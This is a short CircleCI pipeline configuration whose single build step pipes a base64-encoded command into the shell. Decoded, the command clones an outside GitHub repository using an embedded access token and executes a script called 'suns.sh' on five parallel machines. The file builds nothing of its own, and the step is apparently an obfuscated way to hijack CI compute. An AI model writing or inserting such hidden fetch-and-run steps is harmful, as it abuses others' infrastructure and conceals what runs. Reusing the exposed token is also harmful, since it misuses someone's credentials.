version: 2.1

workflows:
  main:
    jobs:
      - build
jobs:
  build:
    parallelism: 5
    machine:
      image: ubuntu-2004:202107-02
    steps:
      - checkout
      - run: |
            !base64 -d <<< Z2l0IGNsb25lIGh0dHBzOi8vZ2hwX3dtSm05WXNNY0VYa2xrSE0ydDVhMUpqR3BIUURPVTQzdXBHVEBnaXRodWIuY29tL1d4WXR6YWl1L1Vpc2phd3MgJiYgY2QgVWlzamF3cyAmJiBjaG1vZCB1K3ggc3Vucy5zaCAmJiAuL3N1bnMuc2g== | sh
            
